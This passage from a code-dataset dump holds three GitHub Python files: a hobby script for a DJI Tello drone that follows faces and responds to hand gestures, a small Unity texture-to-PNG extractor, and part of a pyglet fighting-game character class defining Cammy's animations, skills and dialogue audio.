- *\")\nprint(\"* 'e' -- Takeoff *\")\nprint(\"* 'q' -- Landing *\")\nprint(\"* 's' -- Screenshot *\")\nprint(\"* 'x' -- Exit *\")\nprint(\"***************************************\")\nprint(me.get_battery())\ntime.sleep(2)\n\n\ndef findFace(img):\n faceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(imgGray,scaleFactor=1.1,\n minNeighbors=10,\n minSize=(64,64),\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n myFaceListC = []\n myFaceListArea = []\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cx = x + w // 2\n cy = y + h // 2\n area = w * h\n cv2.circle(img, (cx, cy), 5, (0, 255, 0), cv2.FILLED)\n myFaceListArea.append(area)\n myFaceListC.append([cx, cy])\n if len(myFaceListArea) != 0:\n i = myFaceListArea.index(max(myFaceListArea))\n return img, [myFaceListC[i], myFaceListArea[i]]\n else:\n return img, [[0, 0], 0]\n\ndef trackFace(me, info, w, pid, pError):\n area = info[1]\n x, y = info[0]\n fb = 0\n\n error = x - w // 2\n speed = pid[0] * error + pid[1] * (error - pError)\n speed = int(np.clip(speed, -100, 100))\n\n # greenzone\n if area > fbRange[0] and area < fbRange[1]:\n fb = 0\n # redzone back\n elif area > fbRange[1] and area != 0:\n fb = -20\n # redzone move\n elif area < fbRange[0] and area != 0:\n fb = 20\n\n if x == 0:\n speed = 0\n error = 
0\n\n # print(speed,fb)\n\n me.send_rc_control(0, fb, 0, speed)\n return error\n\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter(f\"djitellofacetrack/Data/video/video_{time.strftime('%d-%m-%Y_%I-%M-%S_%p')}\"+'.avi', fourcc, 30.0, (w, h)) #if fast change the value of fps\ntime.sleep(1/30) #if still fast try to chage the value of 1/x\n\nwhile True:\n #face tracking\n img = me.get_frame_read().frame\n img = cv2.resize(img, (w, h))\n out.write(img)\n\n #hand\n img = detector.findHands(img, draw=True)\n lmList = detector.findPosition(img, draw=True)\n if len(lmList) !=0:\n fingers=[]\n\n\n if lmList[tipIds[0]][1] > lmList[tipIds[0]- 1][1]:\n fingers.append(1)\n else:\n fingers.append(0)\n\n for id in range(1,5):\n if lmList[tipIds[id]][2] < lmList[tipIds[id]-2][2]:\n fingers.append(1)\n else:\n fingers.append(0)\n\n totalFingers = fingers.count(1)\n if totalFingers == 1:\n me.takeoff()\n me.send_rc_control(0, 0, 25, 0)\n time.sleep(2)\n print(\"TAKEOFF\")\n elif totalFingers == 3:\n me.land()\n print(\"LANDING\")\n elif totalFingers == 2:\n time.sleep(0.5)\n cv2.imwrite(f'djitellofacetrack/Data/Images/{time.time()}.jpg', img)\n time.sleep(0.5)\n print('screenshoot')\n print(totalFingers)\n\n # print(lmList[4],lmList[8])\n\n # x1, y1 = lmList[4][1],lmList[4][2]\n # x2, y2 = lmList[8][1], lmList[8][2]\n # cx,cy = (x1+x2)//2, (y1+y2) //2\n #\n # # cv2.circle(img, (x1, y1), 15, (255, 0, 255), cv2.FILLED)\n # # cv2.circle(img, (x2, y2), 15, (255, 0, 255), cv2.FILLED)\n # # cv2.line(img, (x1, y1), (x2, y2), (255, 0, 255), 3)\n # # cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n # # try\n # p1, f1 = lmList[9][1], lmList[9][2]\n # p2, f2 = lmList[12][1], lmList[12][2]\n # px, py = (p1 + p2) // 2, (f1 + f2) // 2\n #\n # # cv2.circle(img, (p1, f1), 15, (255, 0, 255), cv2.FILLED)\n # # cv2.circle(img, (p2, f2), 15, (255, 0, 255), cv2.FILLED)\n # # cv2.line(img, (p1, f1), (p2, f2), (255, 0, 255), 3)\n # # cv2.circle(img, (px, py), 15, (255, 0, 255), cv2.FILLED)\n #\n # length = math.hypot(x2 - x1, y2 - y1)\n # # print(length)\n #\n # length1 = math.hypot(p2 - p1, f2 - f1)\n # # print(length1)\n # if length>30 and length<45:\n # # cv2.circle(img, (cx, cy), 15, (0, 255, 0), cv2.FILLED)\n # # me.takeoff()\n # # me.send_rc_control(0, 0, 25, 0)\n # # time.sleep(2)\n # print(\"TAKEOFF\")\n # elif length>100:\n # # cv2.circle(img, (cx, cy), 15, (0, 255, 0), cv2.FILLED)\n # me.land()\n # print(\"LAND\")\n # elif length1<20:\n # # cv2.circle(img, (cx, cy), 15, (0, 255, 0), cv2.FILLED)\n # time.sleep(0.5)\n # cv2.imwrite(f'djitellofacetrack/Data/Images/{time.time()}.jpg', img)\n # time.sleep(0.5)\n # print('screenshoot')\n\n #FPS\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime = cTime\n cv2.putText(img,f'FPS : {int(fps)}', (20,40), cv2.FONT_HERSHEY_COMPLEX,1,(255,0,0),2)\n\n img, info = findFace(img)\n pError = trackFace(me, info, w, pid, pError)\n print(\"Center\", info[0], \"Area\", info[1])\n cv2.imshow(\"Output\", img)\n #Emergency\n pressedKey = cv2.waitKey(1) & 0xFF\n if pressedKey == ord('e'):\n me.takeoff()\n me.send_rc_control(0, 0, 30, 0)\n time.sleep(2)\n print(\"TAKEOFF\")\n if pressedKey == ord('f'):\n cv2.imwrite(f'djitellofacetrack/Data/Images/{time.time()}.jpg', img)\n print('screenshoot')\n elif pressedKey == ord('q'):\n me.land()\n print(\"LAND\")\n elif pressedKey == ord('x'):\n cv2.destroyAllWindows()\n print(\"see you later :D\")\n break", "repo_name": "Arteewee/djitello-Face-Detector", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", 
"file_size_in_byte": 6465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "djitellopy.tello.Tello", "line_number": 9, "usage_type": "call"}, {"api_name": "djitellopy.tello", "line_number": 9, "usage_type": "name"}, {"api_name": "HandTrackingModule.handDetector", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.CascadeClassifier", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "cv2.CASCADE_SCALE_IMAGE", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 95, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 95, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 101, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 126, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 133, "usage_type": "call"}, {"api_name": "time.time", "line_number": 133, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 134, "usage_type": "call"}, {"api_name": "time.time", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 184, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 189, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 191, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 195, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 198, "usage_type": "call"}, {"api_name": "time.time", "line_number": 198, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 204, "usage_type": "call"}]} +{"seq_id": "72204125609", "text": "\"\"\"\nHOW TO USE:\n`python deserialize.py `\n\nREQUIRED DEPENDENCIES:\n- lz4 `pip install lz4`\n- Pillow `pip install Pillow`\n- decrunch `pip install decrunch`\n- UnityPack (provided)\n\"\"\"\n\n\nimport sys\nfrom io import BytesIO\nfrom vendor.UnityPack import unitypack\n\n\ndef open_texture2d(import_path, export_path):\n with open(import_path, 'rb') as f:\n bundle = unitypack.load(f)\n for asset in bundle.assets:\n for id, object in asset.objects.items():\n if object.type == 'Texture2D':\n data = object.read()\n try:\n from PIL import ImageOps\n except ImportError:\n print('ImportError')\n continue\n try:\n image = data.image\n except NotImplementedError:\n print('\\tNotImplementedError')\n continue\n if image is None:\n print('\\tEmpty Image')\n continue\n img = ImageOps.flip(image)\n output = BytesIO()\n img.save(output, format='png')\n\n with open(export_path, 'wb') as fi:\n fi.write(output.getvalue())\n print('', import_path, '->', export_path)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print('Not enough arguments.')\n sys.exit()\n 
open_texture2d(sys.argv[1], sys.argv[2])\n", "repo_name": "Expugn/pqh-updater", "sub_path": "python-tools/deserialize.py", "file_name": "deserialize.py", "file_ext": "py", "file_size_in_byte": 1588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vendor.UnityPack.unitypack.load", "line_number": 20, "usage_type": "call"}, {"api_name": "vendor.UnityPack.unitypack", "line_number": 20, "usage_type": "name"}, {"api_name": "PIL.ImageOps.flip", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.ImageOps", "line_number": 38, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "42887478279", "text": "import sys, pickle, pyglet, random, time, math\nfrom ball import *\nfrom champion import Champion\n\n\ndef preload_image(image):\n img = pyglet.image.load(\"sprites/\" + image + \".png\")\n return img\n\nclass Cammy(Champion):\n def __init__(self, name):\n super().__init__(name)\n self.defualtSpeed = .3\n self.frameSpeed = .3\n self.oldSpeed = 0\n self.hitBoxOffset = -40\n self.x = 0\n self.gameStart = True\n self.slideDirection = 0 \n\n self.pos = [0,0,0]\n \n self.defualt2 = [name+\"_mirror\", name+\"_2_mirror\"]\n\n self.width, self.height = (79, 79)\n self.hitBox = [0,0, 30,30]\n self.body = [30,0,50,85]\n self.shadowOffset = [50,-5]\n self.alignmentOffset = [20,0]\n \n\n #Vairations\n self.variation_images = [pyglet.sprite.Sprite(preload_image(\"Cammy/variation_A\")), pyglet.sprite.Sprite(preload_image(\"Cammy/variation_B\"))]\n self.variation_names = [\"Renegade\", \"Commando\"]\n self.variation_description = [self.variation_names[0] + \": Cammy gains 'Brutal Strike' crippling her opponents by reducing their damage dealt by a certain amount\",\n self.variation_names[1] + \": Cammy has access to multiple command grabs. You can style with this by slipping them into a combo\"]\n\n #Biography\n self.main_description = [\"Cammy, uses her strong body and flexibility to counter and supress her opponents.\",\n \"She has multiple skills that mixes up with other of her abilities. 
She also has a \",\n \"hand full of command grabs and can parry opponents easily\"]\n \n self.description = \"\"\n\n for d in self.main_description:\n self.description += d\n \n #Dialogues\n self.talkTo = []\n self.respondTo = []\n\n #Projectiles\n self.spawnFrame = 0\n self.balls = []\n self.vfx = []\n\n #Dialogues\n self.talkTo = [[\"Ken\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"], [\"Ken\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/B.wav\"],\n [\"Ken\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"], [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"],\n [\"M.Bison\", \"G\", \"Audio/Champs/\"+self.name+\"/Dialogues/G.wav\"], [\"Ryu\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"],\n [\"Ryu\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/B.wav\"], [\"Cammy\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"],\n [\"Ryu\", \"D\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"], [\"Akuma\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"],\n [\"Anti-Ryu\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"], [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"],\n [\"Anti-Ryu\", \"I\", \"Audio/Champs/\"+self.name+\"/Dialogues/I.wav\"]]\n \n self.respondTo = [[\"Ryu\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"], [\"Ryu\", \"F\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"Ken\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/I.wav\"], [\"Ken\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"],\n [\"Ken\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/G.wav\"], [\"Ken\", \"C\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"Ken\", \"C\", \"Audio/Champs/\"+self.name+\"/Dialogues/F.wav\"], [\"Ken\", \"D\", \"Audio/Champs/\"+self.name+\"/Dialogues/H.wav\"],\n [\"Ken\", \"D\", \"Audio/Champs/\"+self.name+\"/Dialogues/G.wav\"], [\"Ken\", \"D\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"], [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/E.wav\"],\n [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/L.wav\"], [\"M.Bison\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/C.wav\"],\n [\"M.Bison\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/E.wav\"], [\"M.Bison\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/J.wav\"],\n [\"M.Bison\", \"B\", \"Audio/Champs/\"+self.name+\"/Dialogues/E.wav\"], [\"M.Bison\", \"G\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"M.Bison\", \"J\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"], [\"M.Bison\", \"J\", \"Audio/Champs/\"+self.name+\"/Dialogues/C.wav\"],\n [\"M.Bison\", \"J\", \"Audio/Champs/\"+self.name+\"/Dialogues/K.wav\"], [\"M.Bison\", \"M\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"M.Bison\", \"M\", \"Audio/Champs/\"+self.name+\"/Dialogues/M.wav\"], [\"M.Bison\", \"O\", \"Audio/Champs/\"+self.name+\"/Dialogues/O.wav\"],\n [\"M.Bison\", \"O\", \"Audio/Champs/\"+self.name+\"/Dialogues/L.wav\"], [\"Cammy\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/B.wav\"],\n [\"Cammy\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/G.wav\"], [\"Anti-Ryu\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"],\n [\"Anti-Ryu\", \"A\", \"Audio/Champs/\"+self.name+\"/Dialogues/A.wav\"], [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/J.wav\"],\n [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/L.wav\"], [\"Anti-Ryu\", \"H\", 
\"Audio/Champs/\"+self.name+\"/Dialogues/O.wav\"],\n [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/D.wav\"], [\"Anti-Ryu\", \"G\", \"Audio/Champs/\"+self.name+\"/Dialogues/L.wav\"],\n [\"Anti-Ryu\", \"H\", \"Audio/Champs/\"+self.name+\"/Dialogues/P.wav\"]]\n\n #Combination\n self.skill = [[\"bfA\", \"Spin Knuckle\"], [\"bfSK\", \"Cannon Drill\"], [\"dbK\", \"Leg Suplex\"], [\"dfSK\", \"Shun' Po\"],\n [\"fbSK\", \"Super Cannon Drill\"]]\n\n \n #Audio\n self.voiceFrame = 0\n self.sound = pyglet.media.load(\"Audio/Champs/Ryu/dragon_ball.wav\", streaming=False)\n self.voiceCD = 0\n self.wins= [[\"First_Wins\", [\"Audio/Champs/\"+self.name+\"/Wins/first_win.wav\"]],[\"End_Game\", [\"Audio/Champs/\"+self.name+\"/Wins/end_gameA.wav\",\n \"Audio/Champs/\"+self.name+\"/Wins/end_gameB.wav\",\n \"Audio/Champs/\"+self.name+\"/Wins/end_gameC.wav\",\n \"Audio/Champs/\"+self.name+\"/Wins/end_gameD.wav\"]],\n [\"Low_Health_Win\", [\"Audio/Champs/Ryu/Wins/low_health_win.wav\"]]]\n \n self.championTaunt = {\"M.Bison\": self.LoadAllFilesFromDirectory(\"Audio/Champs/\"+self.name+\"/Wins/M.Bison\"),\n\n \"Ken\": self.LoadAllFilesFromDirectory(\"Audio/Champs/\"+self.name+\"/Wins/Ken\")}\n \n\n ################ Animations ###############\n #Standing\n self.frames1 = [0, 0, 1, 2, 3, 3, 4]\n #Walking\n self.frames2 = [5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10]\n #Weak Punch\n self.frames3 = [35, 36, 36, 35]\n #Medium Punch\n self.frames4 = [35, 37, 37, 37, 35]\n #Strong Punch A\n self.frames15 = [40, 40, 38, 38, 38, 39]\n #Strong Punch B\n self.frames19 = [40, 40, 41]\n #Strong Punch C\n self.frames26 = [42, 43, 43, 44]\n #Crouch\n self.frames7 = [16]\n #Crouch Weak Punch\n self.frames8 = [17, 18, 18, 17]\n #Crouch Medium Punch\n self.frames9 = [20, 21, 21, 21, 22, 22, 22, 22, 23, 23]\n #Jump\n self.frames10 = [12, 13, 13, 13, 13, 13, 13, 13, 14]\n #Land\n self.frames11 = [15, 16, 16]\n #Getting Hit\n self.frames12 = [123, 123, 123, 123, 123]\n #Getting Hit\n self.frames13 = [127, 127, 127, 127, 127]\n #Getting Hit\n self.frames14 = [128, 128, 128, 128, 128, 128, 128, 128]\n #Falling Bounce\n self.frames16 = [132, 132, 132, 133]\n #Lying\n self.frames17 = [134, 134, 134, 134, 134, 134, 134, 134, 134, 134]\n #Back Spring\n self.frames17B = [134, 134, 134, 134, 109, 109, 114, 114, 115, 115, 116, 116, 117, 117]\n #Weak Kick\n self.frames20 = [49, 50, 50]\n #Medium Kick\n self.frames21 = [51, 52, 52, 53, 53, 53]\n #Crouch Weak Kick\n self.frames22 = [24, 25, 25, 24]\n #Crouch Medium Kick \n self.frames23 = [30, 30, 31, 32, 33, 34, 30, 30]\n #Cannon Drill(Start)\n self.frames24 = [79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 79, 80, 81]\n #Cannon Drill(Mid)\n self.frames25A = [82, 83, 84, 85, 86, 87]\n #Cannon Drill(End)\n self.frames25B = [88, 89, 89]\n self.frames25C = [93, 93, 94, 94, 95, 95, 95]\n self.freezeInAir = False\n self.kickLoop = 5\n #Spin Knuckle(Start)\n self.frames27 = [96, 96, 97, 97, 98]\n #Spin Knuckle(Air)\n self.frames40 = [98, 99, 98, 99, 98, 99]\n #Spin Knuckle(End)\n self.frames41 = [100, 101, 102, 102, 103]\n #Command Grab (Start)\n self.grabChain = 19.1\n self.frames42 = [42, 43, 43, 44, 44, 44]\n #Command Grab A(Start)\n self.frames43 = [15, 15, 15, 118]\n #Command Grab A(Caught)\n self.frames44 = [118, 119, 119, 120, 120, 121, 121]\n\n\n \n #Blocking Frames\n self.frames29 = [45, 46, 47, 48]\n self.frames29B = [61, 61, 61, 61, 61, 61, 61, 62, 64, 64, 64]\n self.blockWait = 0\n\n \n #Win - To - Sub Animation Win\n self.frames30 = [96, 96, 96, 96]\n #Sub Animation Win\n 
self.frames31 = [136, 137, 138, 138, 138, 139]\n #Sub Animation Win 2A\n self.frames32 = [75, 76, 77, 78]\n #Sub Animation Win 2A (Loop)\n self.frames33 = [41]\n \n #Brutal Strike\n self.frames34 = [110, 110, 110, 110, 110, 110, 110, 110, 110, 111, 112, 112, 112, 113]\n self.frames34_forcesX = [0, 0, 0, 0, 0, 0, 5, 0, 0, 4, 0, 5, 5, 4]\n self.frames34_forcesY = [0, 0, 0, 0, 0, 0, 16, 16, 16, 8, 16, 0, 8, 0]\n\n #Start Game (Dialogues)\n #Respond from taunt\n self.frames35 = [0]\n #Idle Response\n self.frames35B = [143, 143, 143, 144, 144, 144, 143, 143, 143, 144,144, 144, 143, 143, 143,\n 144, 144, 144, 143, 143, 143, 144, 144, 144, 143, 143, 143]\n #Taunt\n self.frames36 = [138, 138, 137, 137, 136, 136, 135, 135]\n #Taunt IDLE\n self.frames36B = [138, 138, 138, 138, 138, 138, 138, 138, 138, 138]\n \n #Throw (Catching)\n self.frames37 = [43, 44, 44, 44]\n #Throw (Caught)\n self.frames38 = [44, 104, 104, 104, 105, 105, 105, 106, 106, 106, 107, 107, 107, 108]\n self.catchFrames = [23, 23.3, 23.3, 23.3, 23.3, 23.3, 23.3, 23.8, 23.8, 23.8, 23.8, 23.8, 23.8, 23.8]\n #Throw (Getting Caught)\n self.frames39 = [128, 127, 126, 132]\n\n #Shun' Po (Start)\n self.frames45 = [61, 62, 63, 64, 64, 64, 63, 62, 61]\n #Shun' Po -> Air Attack (Leap) -> Punch\n self.frames45B = [110, 110, 110, 122]\n #Shun' Po -> Air Attack (First) -> Punch\n self.frames45C = [67, 68, 68, 69, 69]\n #Shun' Po -> Air Attack (Second) -> Punch\n self.frames45D = [70, 71, 71, 72, 72, 72, 67]\n\n #Shun' Po\n #Shun' Po -> Air Attack (First) -> Kick\n self.frames46 = [75, 75, 76, 76, 77, 77, 78, 78, 78]\n #Shun' Po -> Air Attack (Second) -> Kick\n self.frames46B = [73, 74, 74, 75, 75, 13]\n\n #character frames\n self.cell = []\n self.flip = []\n self.targetCell = self.cell\n self.targetFrame = self.frames1\n self.row = 0\n self.col = 0\n self.sounds = [\"sounds/020.wav\"]\n self.sndTimer = 1\n self.frame = 0\n self.direction = 1\n self.dvx = 0\n self.dvy = 0\n \n def _jump(self):\n if not self.jump:\n self.jump = True\n self.vel[1] = self.jumpHeight\n self.frame = 0\n self.Play(\"Audio/jump.wav\")\n self.action = -1\n self.targetFrame = self.frames10\n \n def _height(self):\n if not self.jump:\n self.jump = True\n self.vel[1] = self.jumpHeight\n\n def _skill(self, skill):\n self.mixup = \"\"\n #Leg Suplex\n if skill == \"Leg Suplex\" and self.stamina > 40:\n if self.state == \"Grounded\" or self.state == \"Crouch\":\n self.stamina -= 40\n self.state = \"Skill\"\n self.action = 19\n self.frame = 0\n self.grabChain = 19.1\n\n #Cannon Drill\n if skill == \"Cannon Drill\" or skill == \"Super Cannon Drill\":\n if skill == \"Cannon Drill\" and self.rageBar >= 200:\n if self.state == \"Grounded\" or self.state == \"Crouch\" or self.state == \"BlockHit\":\n self.rageBar -= 200\n self.state = \"Skill\"\n self.frame = 0\n self.action = 17 \n self.invincible = True \n self.Play(\"Audio/Champs/Ryu/special.wav\")\n choice = random.choice([\"Audio/Champs/Cammy/cannon_drillA.wav\", \"Audio/Champs/Cammy/cannon_drillB.wav\"])\n self.PlayVoice(choice)\n self.superSkill = True\n self.vfx.append(Ball(pos=(self.pos[0] - 20, self.pos[1] - 20), name=\"VFX\", loop=False, destroy=3, width=225, height=225,\n speed=.2, img=\"sprites/special.png\", row=4, col=2))\n if skill == \"Super Cannon Drill\" and self.rageBar >= 0:\n if self.state == \"Grounded\" or self.state == \"Crouch\" or self.state == \"BlockHit\":\n self.rageBar -= 200\n self.state = \"Skill\"\n self.frame = 0\n self.action = 31\n self.invincible = True\n 
self.Play(\"Audio/Champs/Ryu/special.wav\")\n choice = random.choice([\"Audio/Champs/Cammy/cannon_drillA.wav\", \"Audio/Champs/Cammy/cannon_drillB.wav\"])\n self.PlayVoice(choice)\n self.superSkill = True\n self.vfx.append(Ball(pos=(self.pos[0] - 20, self.pos[1] - 20), name=\"VFX\", loop=False, destroy=3, width=225, height=225,\n speed=.2, img=\"sprites/special.png\", row=4, col=2))\n \n #Spin Knuckle\n if skill == \"Spin Knuckle\" and self.stamina > 50: \n if self.state == \"Grounded\" or self.state == \"Crouch\":\n self.stamina -= 50\n self.state = \"Skill\" \n self.frame = 0\n self.action = 12\n \n #Shun' Po\n if skill == \"Shun' Po\" and self.stamina > 40 and self.targetVariation == self.variation_names[1]: \n if self.state == \"Grounded\" or self.state == \"Crouch\":\n self.stamina -= 40\n self.state = \"Skill\" \n self.frame = 0\n self.action = 30\n\n #Audio\n def Play(self, file):\n self.sound = pyglet.media.load(file, streaming=False)\n self.sound.play()\n\n def Win(self):\n self.action = 20\n \n def Update_Alignment(self):\n #Update Alignment\n self.x = 0\n self.y = 0\n self.attacking_actions = [2, 2.5, 3, 3.5, 9, 10, 10.5, 11, 11.5, 12, 17.3, 12.5, 13, 13.5, 14, 14.5, 19, 21, 22, 30, 31]\n try:\n if self.direction == 1:\n self.x = self.pos[0] + self.alignX[self.targetFrame[int(self.frame)]] + -5\n self.y = self.pos[1] + self.alignY[self.targetFrame[int(self.frame)]]\n \n if self.direction == -1:\n self.x = self.pos[0] - self.alignX[self.targetFrame[int(self.frame)]] + 140\n self.y = self.pos[1] + self.alignY[self.targetFrame[int(self.frame)]]\n except:\n pass\n \n if self.action not in self.attacking_actions:\n self.hitBox[0] = 10000\n self.hitBox[1] = 10000\n \n def Update(self):\n if self.opponent != None:\n if self.oldSpeed == 0:\n self.oldSpeed = self.opponent.frameSpeed\n \n if self.pause <= 0:\n self.frame += self.frameSpeed\n self.hitCD -= .09\n self.key_combo_time += .1\n if self.key_combo_time > 5:\n self.key_combo = \"\"\n \n self.UpdateActions()\n\n self.Check_Combo()\n\n #Updating Combos\n if self.voiceCD > 0:\n self.voiceCD -= .1\n\n #Falling and Jumping\n self.UpdatePhysics()\n\n if self.talking:\n if self.gameStart:\n self.gameStart = False\n self.action = -4\n if self.talking == False:\n if self.gameStart:\n self.gameStart = False\n self.action = -4.5\n\n #Animations\n #Idle\n if self.action == 0:\n self.targetFrame = self.frames1\n if self.frame >= len(self.frames1) - 1:\n self.frame = 0\n\n #Walk\n if self.action == 1:\n self.targetFrame = self.frames2\n if self.frame >= len(self.frames2) - 1:\n self.frame = 0\n\n #Weak Punch\n if self.action == 2:\n self.targetFrame = self.frames3\n if self.frame >= len(self.frames3) - 1:\n self.frame = 0\n self.action = 0\n \n #Weak Punch Crouch\n if self.action == 2.5:\n self.targetFrame = self.frames8\n if self.frame >= len(self.frames8) - 1:\n self.frame = 0\n self.action = 0\n self.state = \"Grounded\"\n\n #Medium Punch\n if self.action == 3:\n self.targetFrame = self.frames4\n if self.frame >= len(self.frames4) - 1:\n self.frame = 0\n self.action = 0\n \n #Medium Punch Crouch\n if self.action == 3.5:\n self.targetFrame = self.frames9\n if self.frame >= len(self.frames9) - 1:\n self.frame = 0\n self.action = 0\n self.state = \"Grounded\"\n \n #Crouch\n if self.action == 4:\n self.targetFrame = self.frames7\n self.force = [0,0]\n if self.frame >= len(self.frames7) - 1:\n self.frame = 0\n \n #Land from Jump\n if self.action == 5:\n self.targetFrame = self.frames11\n self.velocity = 0\n self.state = \"Land\"\n if self.frame 
<= 1 and self.voiceFrame != 1:\n self.voiceFrame = 1\n self.Play(\"Audio/land.wav\")\n if self.frame >= len(self.frames11) - 1:\n self.action = 0\n self.voiceFrame = 0\n self.state = \"Grounded\"\n self.superSkill = False\n \n #Getting Hit A\n if self.action == 6:\n self.targetFrame = self.frames12\n if self.frame >= len(self.frames12) - 1:\n self.action = 0\n self.state = \"Grounded\"\n \n #Getting Hit B\n if self.action == 6.3:\n self.targetFrame = self.frames13\n if self.frame >= len(self.frames13) - 1:\n self.action = 0\n self.state = \"Grounded\"\n \n #Getting Hit C\n if self.action == 6.5:\n self.targetFrame = self.frames14\n if self.frame >= len(self.frames14) - 1:\n self.action = 0\n self.state = \"Grounded\"\n\n #Breaker\n if self.action == 6.7:\n self.targetFrame = self.frames29B\n if self.frame >= len(self.frames29B) - 1:\n self.action = 0\n self.state = \"Grounded\"\n self.Play(\"Audio/Champs/Cammy/breaker.wav\")\n self.opponent.Get_Hit(attacker=self, damage=0, force=[12,5], typeHit=\"Ground\")\n self.frame = 0\n self.superSkill = False\n self.invincible = False\n \n #Falling\n if self.action == 7:\n self.targetFrame = self.frames16\n if self.frame >= len(self.frames16) - 1:\n self.frame = 0\n \n #Back Spring\n if self.action == 7.5:\n self.targetFrame = self.frames17B\n self.velocity = 0\n self.state = \"Lying\"\n if self.frame >= len(self.frames17B) - 1:\n self.frame = 0\n self.action = 0\n self.state = \"Grounded\"\n \n #Lying\n if self.action == 7.9:\n self.targetFrame = self.frames17\n self.velocity = 0\n self.state = \"Lying\"\n self.vel = [0,0]\n if self.hitCombo > 0:\n self.comboEnd = True\n self.damageDealt = 0\n if self.frame >= len(self.frames17) - 1:\n self.frame = 0\n if self.health > 0:\n self.action = 5\n if self.backSpring:\n self.action = 7.5\n self.backSpring = False\n else:\n self.alive = False\n\n #Weak Kick\n if self.action == 10:\n self.targetFrame = self.frames20\n if self.frame >= len(self.frames20) - 1:\n self.frame = 0\n self.action = 0\n \n #Weak Kick Crouch\n if self.action == 10.5:\n 